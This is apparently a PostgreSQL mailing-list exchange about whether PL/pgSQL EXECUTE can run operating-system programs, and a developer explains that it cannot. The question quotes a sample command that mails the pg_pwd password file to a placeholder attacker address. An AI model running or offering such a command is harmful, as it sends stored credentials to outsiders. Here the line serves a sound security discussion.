KuroiNeko wrote:
> > Huh? This would only be true if all operations inside plpgsql are
> > executed as superuser, which they are not. Seems to me the existing
> > defense against non-superuser using COPY is sufficient.
>
>  Sorry if I missed the point, but  if I got it right, Pl/Pgsql EXECUTE will
> allow execution of any program via exec*() call? If so, this will allow any
> (system) user to  execute arbitrary code as postgres  (system) user, right?
> If so, how can something like
>
> EXECUTE '/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd';
>
>  be avioded?

    No,  EXECUTE  just passes a string down to SPI_exec() without
    trying to prepare and save an execution plan for it. It's not
    equivalent to system(3).


Jan

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